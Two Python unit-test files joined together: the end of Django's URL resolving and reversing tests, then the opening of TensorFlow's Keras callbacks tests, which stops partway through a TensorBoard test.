request = HttpRequest()
self.assertIsNone(request.resolver_match)
def test_repr(self):
self.assertEqual(
repr(resolve('/no_kwargs/42/37/')),
"ResolverMatch(func=urlpatterns_reverse.views.empty_view, "
"args=('42', '37'), kwargs={}, url_name=no-kwargs, app_names=[], "
"namespaces=[], route=^no_kwargs/([0-9]+)/([0-9]+)/$)",
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.erroneous_urls')
class ErroneousViewTests(SimpleTestCase):
def test_noncallable_view(self):
# View is not a callable (explicit import; arbitrary Python object)
with self.assertRaisesMessage(TypeError, 'view must be a callable'):
path('uncallable-object/', views.uncallable)
def test_invalid_regex(self):
# Regex contains an error (refs #6170)
msg = '(regex_error/$" is not a valid regular expression'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
reverse(views.empty_view)
class ViewLoadingTests(SimpleTestCase):
def test_view_loading(self):
self.assertEqual(get_callable('urlpatterns_reverse.views.empty_view'), empty_view)
self.assertEqual(get_callable(empty_view), empty_view)
def test_view_does_not_exist(self):
msg = "View does not exist in module urlpatterns_reverse.views."
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.views.i_should_not_exist')
def test_attributeerror_not_hidden(self):
msg = 'I am here to confuse django.urls.get_callable'
with self.assertRaisesMessage(AttributeError, msg):
get_callable('urlpatterns_reverse.views_broken.i_am_broken')
def test_non_string_value(self):
msg = "'1' is not a callable or a dot-notation path"
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable(1)
def test_string_without_dot(self):
msg = "Could not import 'test'. The path must be fully qualified."
with self.assertRaisesMessage(ImportError, msg):
get_callable('test')
def test_module_does_not_exist(self):
with self.assertRaisesMessage(ImportError, "No module named 'foo'"):
get_callable('foo.bar')
def test_parent_module_does_not_exist(self):
msg = 'Parent module urlpatterns_reverse.foo does not exist.'
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.foo.bar')
def test_not_callable(self):
msg = (
"Could not import 'urlpatterns_reverse.tests.resolve_test_data'. "
"View is not callable."
)
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.tests.resolve_test_data')
class IncludeTests(SimpleTestCase):
url_patterns = [
path('inner/', views.empty_view, name='urlobject-view'),
re_path(r'^inner/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='urlobject-view'),
re_path(r'^inner/\+\\\$\*/$', views.empty_view, name='urlobject-special-view'),
]
app_urls = URLObject('inc-app')
def test_include_urls(self):
self.assertEqual(include(self.url_patterns), (self.url_patterns, None, None))
def test_include_namespace(self):
msg = (
'Specifying a namespace in include() without providing an '
'app_name is not supported.'
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include(self.url_patterns, 'namespace')
def test_include_4_tuple(self):
msg = 'Passing a 4-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace', 'blah'))
def test_include_3_tuple(self):
msg = 'Passing a 3-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'))
def test_include_3_tuple_namespace(self):
msg = 'Cannot override the namespace for a dynamic module that provides a namespace.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'), 'namespace')
def test_include_2_tuple(self):
self.assertEqual(
include((self.url_patterns, 'app_name')),
(self.url_patterns, 'app_name', 'app_name')
)
def test_include_2_tuple_namespace(self):
self.assertEqual(
include((self.url_patterns, 'app_name'), namespace='namespace'),
(self.url_patterns, 'app_name', 'namespace')
)
def test_include_app_name(self):
self.assertEqual(
include(self.app_urls),
(self.app_urls, 'inc-app', 'inc-app')
)
def test_include_app_name_namespace(self):
self.assertEqual(
include(self.app_urls, 'namespace'),
(self.app_urls, 'inc-app', 'namespace')
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class LookaheadTests(SimpleTestCase):
def test_valid_resolve(self):
test_urls = [
'/lookahead-/a-city/',
'/lookbehind-/a-city/',
'/lookahead+/a-city/',
'/lookbehind+/a-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
self.assertEqual(resolve(test_url).kwargs, {'city': 'a-city'})
def test_invalid_resolve(self):
test_urls = [
'/lookahead-/not-a-city/',
'/lookbehind-/not-a-city/',
'/lookahead+/other-city/',
'/lookbehind+/other-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
with self.assertRaises(Resolver404):
resolve(test_url)
def test_valid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'a-city'}, '/lookahead+/a-city/'),
('lookahead-negative', {'city': 'a-city'}, '/lookahead-/a-city/'),
('lookbehind-positive', {'city': 'a-city'}, '/lookbehind+/a-city/'),
('lookbehind-negative', {'city': 'a-city'}, '/lookbehind-/a-city/'),
]
for name, kwargs, expected in test_urls:
with self.subTest(name=name, kwargs=kwargs):
self.assertEqual(reverse(name, kwargs=kwargs), expected)
def test_invalid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'other-city'}),
('lookahead-negative', {'city': 'not-a-city'}),
('lookbehind-positive', {'city': 'other-city'}),
('lookbehind-negative', {'city': 'not-a-city'}),
]
for name, kwargs in test_urls:
with self.subTest(name=name, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, kwargs=kwargs)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(test.TestCase):
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@test_util.run_deprecated_v1
def test_TensorBoard(self):
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
yield (x_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
else:
yield (x_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
i += 1
i %= max_batch_index
# case: Sequential
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=temp_dir, histogram_freq=1, write_images=True,
write_grads=True, batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
# fit with validation data and accuracy
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
# fit generator with validation data
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data
# histogram_freq must be zero
tsb.histogram_freq = 0
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
callbacks=cbks,
verbose=0)
# fit generator with validation data and accuracy
tsb.histogram_freq = 1
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data and accuracy
tsb.histogram_freq = 0
model.fit_generator(
data_generator(True), len(x_train), epochs=2, callbacks=cbks)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_TensorBoard_multi_input_output(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
filepath = os.path.join(tmpdir, 'logs')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
# simulate multi-input/output models
yield ([x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
else:
yield ([x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
i += 1
i %= max_batch_index
inp1 = keras.Input((INPUT_DIM,))
inp2 = keras.Input((INPUT_DIM,))
inp = keras.layers.add([inp1, inp2])
hidden = keras.layers.Dense(2, activation='relu')(inp)
hidden = keras.layers.Dropout(0.1)(hidden)
output1 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
output2 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
